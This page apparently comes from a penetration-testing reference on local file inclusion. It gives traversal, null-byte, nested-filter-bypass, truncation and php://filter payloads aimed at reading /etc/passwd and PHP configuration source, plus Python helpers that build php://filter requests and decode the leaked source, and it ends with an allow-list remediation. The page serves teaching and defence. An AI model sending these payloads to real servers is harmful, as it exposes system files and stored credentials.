File Inclusion

File inclusion happens when an application builds a file path from user input without validating it, which lets an attacker point the application at a file of their choosing so that its contents are read or, in the case of scripts, executed.

Impact

  • Reading contents of a file

  • Code execution on the web server

  • Client-side code execution, for example JavaScript served back to the browser, which can lead to other attacks such as cross-site scripting (XSS)

  • Denial of Service (DoS)

  • Sensitive Information Disclosure

Local File Inclusion

LFI is the inclusion of files that are already present on the target server. It occurs when a path passed to an include statement is not properly sanitized.

For example, when an application takes a file path from user input and does not sanitize it, the attacker can inject sequences such as ../ (the dot-dot-slash attack) into that input to walk out of the intended directory.

Methodology

Testing for LFI

Basic Example

Dot-dot-slash attack ../ or Path traversal

http://vulnerable_host/preview.php?file=example.html
http://vulnerable_host/preview.php?file=../../../../etc/passwd

Null Byte Injection

The null character %00 (also known as the null terminator or null byte) is a control character with the value zero. In C-style strings it marks the end of the string, so a C-level filesystem call stops reading the path at that byte and everything after it is ignored.

This matters when the application appends a fixed suffix to the input, for example include($_GET['file'] . '.php'): a null byte at the end of the injected path causes the suffix to be dropped. PHP 5.3.4 and later reject paths that contain a null byte, so this bypass only works against legacy installations.

http://vulnerable_host/preview.php?file=../../../../etc/passwd%00

Bypass Filters That Strip ../

Sometimes applications keep a deny list and remove certain keywords or characters from the input. One way around this is to URL-encode the characters (Ctrl+U in Burp Suite), but that only works when the filter inspects the still-encoded value and decoding happens afterwards (for example a front-end check on the raw query string); PHP fills $_GET with already-decoded values, so a deny list applied there sees the plain ../.

A more reliable trick targets filters that delete ../ in a single pass: nest an extra sequence inside each ../ so that when the filter removes the match, the characters left on either side join back together into ../. A filter that repeats the removal until nothing matches is not fooled by this.

Example:

  • From: ..././..././..././..././..././etc/passwd

  • To: ../../../../../etc/passwd

..././..././..././..././..././etc/passwd
....//....//....//....//....//etc/passwd
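The following script is an added example, not code from the original page: it simulates a deny-list filter in the two variants discussed above (one that removes ../ in a single pass, like PHP's str_replace, and one that repeats the removal until nothing is left) and runs the page's payloads through each, together with a percent-encoded variant, to show which ones still resolve to /etc/passwd. The document root /var/www/html and the assumption that the filter runs on the raw, still-encoded value are the example's own choices.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root of the vulnerable application (not from the page).
WEB_ROOT = "/var/www/html"


def strip_once(user_path: str) -> str:
    """Deny-list filter that removes every "../" in a single pass.

    str.replace behaves like PHP's str_replace: it scans left to right and
    never re-examines characters that become adjacent after a deletion,
    which is the weakness the nested payloads exploit.
    """
    return user_path.replace("../", "")


def strip_recursive(user_path: str) -> str:
    """The same filter applied until no "../" is left; nesting does not help here."""
    while "../" in user_path:
        user_path = user_path.replace("../", "")
    return user_path


def resolve(filtered: str) -> str:
    """Path that include() would finally open.

    The filter is modelled as running on the raw, still URL-encoded value,
    with decoding happening afterwards; that ordering is what lets the
    %2e%2e%2f variant slip through. posixpath.normpath collapses "." and
    ".." the way the kernel does and clamps surplus ".." at "/".
    """
    return posixpath.normpath(posixpath.join(WEB_ROOT, unquote(filtered)))


def escapes_root(resolved: str) -> bool:
    """True if the resolved path lies outside the document root."""
    return resolved != WEB_ROOT and not resolved.startswith(WEB_ROOT + "/")


def run(payload: str, filt) -> tuple[str, bool]:
    """Apply a filter to a payload; return where it lands and whether it escaped."""
    resolved = resolve(filt(payload))
    return resolved, escapes_root(resolved)


# Constructed inputs: the payloads from the section above plus an encoded one.
PAYLOADS = {
    "plain":   "../../../../etc/passwd",
    "nested1": "..././..././..././..././..././etc/passwd",
    "nested2": "....//....//....//....//....//etc/passwd",
    "encoded": "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
}

if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        for filt in (strip_once, strip_recursive):
            resolved, escaped = run(payload, filt)
            print(f"{filt.__name__:16} {name:8} -> {resolved}  escaped={escaped}")
```

Running it shows the plain payload stopped by both filters, the two nested payloads reassembling into ../../../../../etc/passwd under the single-pass filter but collapsing to etc/passwd under the recursive one, and the encoded payload passing both filters untouched because neither looks for the encoded form.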

Path and Dot Truncation

On Linux the maximum path length is 4096 bytes (PATH_MAX). Older PHP releases silently truncated a longer filename at that limit and discarded the rest, so a suffix appended by the application could be pushed past the cut-off by padding the path. Current PHP releases refuse the include with a warning that the file name exceeds the maximum path length instead of truncating, so treat this as a legacy bypass and confirm the PHP version before spending time on it.

It is commonly combined with other bypass strategies such as encoding part of the file path in Unicode, double encoding, or any other input that still resolves to the desired filename.

http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd

[ADD MORE] stands for repeating the padding until the complete path is longer than the 4096-byte limit.

PHP Wrappers

  • A wrapper is code that surrounds other code to add functionality. PHP ships with many built-in stream wrappers that can be used with its filesystem functions, including include.

PHP Filter

php://filter is a case-insensitive wrapper for the local file system that applies stream filters to a file as it is opened. Because the file is read through a filter rather than handed to the interpreter, it can be used to retrieve the contents of a PHP script without the server executing it.

The wrapper is used as php://filter/convert.base64-encode/resource=FILE, where FILE is the file to retrieve. The target file is read, base64-encoded (this is the step that prevents server-side execution, since the output no longer contains <?php tags) and the encoded blob is returned in the response; decoding it yields the original source, for example of the vulnerable script itself or of a configuration file holding credentials. php://filter is a local wrapper and does not require allow_url_include or allow_url_fopen to be enabled.
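As an added example (not code from the page), the helper below builds the php://filter request against the preview.php endpoint used in this page's examples and then recovers the file from the server's reply, where the base64 blob is usually embedded in the HTML of the page that performed the include. The sample response is constructed inside the script; the file it pretends to contain is made up for the demonstration.

```python
import base64
import re
from urllib.parse import quote

# Assumed vulnerable endpoint; vulnerable_host is the placeholder this page uses.
TARGET = "http://vulnerable_host/preview.php"


def filter_url(resource: str) -> str:
    """Build the request that makes include() read `resource` through
    php://filter and emit it base64-encoded instead of executing it."""
    wrapper = f"php://filter/convert.base64-encode/resource={resource}"
    # Keep the wrapper readable; only characters that would break the query
    # string (spaces, &, #, % and the like) are percent-encoded.
    return f"{TARGET}?file={quote(wrapper, safe='/:=')}"


def extract_source(response_body: str) -> str:
    """Recover the original file from the HTML the server wrapped around
    the include() output.

    Heuristic: the longest run of base64 alphabet characters in the body is
    the encoded file; everything else is page markup."""
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", response_body)
    if not runs:
        raise ValueError("no base64 payload found in response")
    blob = max(runs, key=len)
    return base64.b64decode(blob, validate=True).decode("utf-8", errors="replace")


# Constructed sample standing in for a real reply: the source of an imaginary
# config.php as the wrapper would emit it, embedded in the preview page's HTML.
SAMPLE_SOURCE = (
    "<?php\n"
    "// constructed example file, not a real configuration\n"
    "$db_user = 'app';\n"
    "$db_pass = 'example-only';\n"
)
SAMPLE_RESPONSE = (
    "<html><body><h1>Preview</h1><pre>"
    + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
    + "</pre></body></html>"
)

if __name__ == "__main__":
    print(filter_url("config.php"))
    print(extract_source(SAMPLE_RESPONSE))
```

The recovered text starts with <?php, which is exactly what a direct include of the same file would never show you, because the interpreter would have executed it instead.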

Remediation

The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem or framework API at all. Where that is not possible, the application can maintain an allow list of the files the page may include and have the request carry an identifier (for example an index number) that is mapped to the selected file on the server side, so the user never supplies a path.

Any request whose identifier is not on the list must be rejected; this leaves no attack surface for manipulating the path.
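The following is an added example of the allow-list approach described above, written for this page rather than taken from it. The template directory, the three page files and the vulnerable "before" handler are assumptions made for the demonstration; the hardened handler only ever uses the request value as a dictionary key.

```python
import posixpath

# Assumed layout for this example; the directory and file names are not from the page.
TEMPLATE_ROOT = "/var/www/templates"
PAGES = {            # identifier -> file; the only files preview.php may include
    "1": "example.html",
    "2": "about.html",
    "3": "contact.html",
}


class InvalidPageId(ValueError):
    """Raised for any identifier that is not on the allow list."""


def vulnerable_preview(file_param: str) -> str:
    """The original pattern: the request value becomes part of the path."""
    return posixpath.normpath(posixpath.join(TEMPLATE_ROOT, file_param))


def resolve_page(page_id: str) -> str:
    """Hardened version: the request value is only ever a lookup key."""
    if page_id not in PAGES:
        raise InvalidPageId(f"rejected page id {page_id!r}")
    path = posixpath.normpath(posixpath.join(TEMPLATE_ROOT, PAGES[page_id]))
    # Defence in depth: a careless future edit to PAGES must not be able to
    # point outside the template directory either.
    if not path.startswith(TEMPLATE_ROOT + "/"):
        raise InvalidPageId(f"allow-list entry for {page_id!r} leaves the template root")
    return path


def handle_preview(file_param: str) -> tuple[int, str]:
    """Simulated request handler: (HTTP status, path to include or error text)."""
    try:
        return 200, resolve_page(file_param)
    except InvalidPageId as exc:
        return 400, str(exc)


if __name__ == "__main__":
    for value in ("1", "../../../../etc/passwd", "1\x00"):
        print(f"{value!r:28} vulnerable -> {vulnerable_preview(value)}")
        print(f"{'':28} hardened   -> {handle_preview(value)}")
```

With the vulnerable handler the traversal payload resolves to /etc/passwd; with the hardened one it, the null-byte variant and any unknown identifier all get a 400 without ever touching the filesystem.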
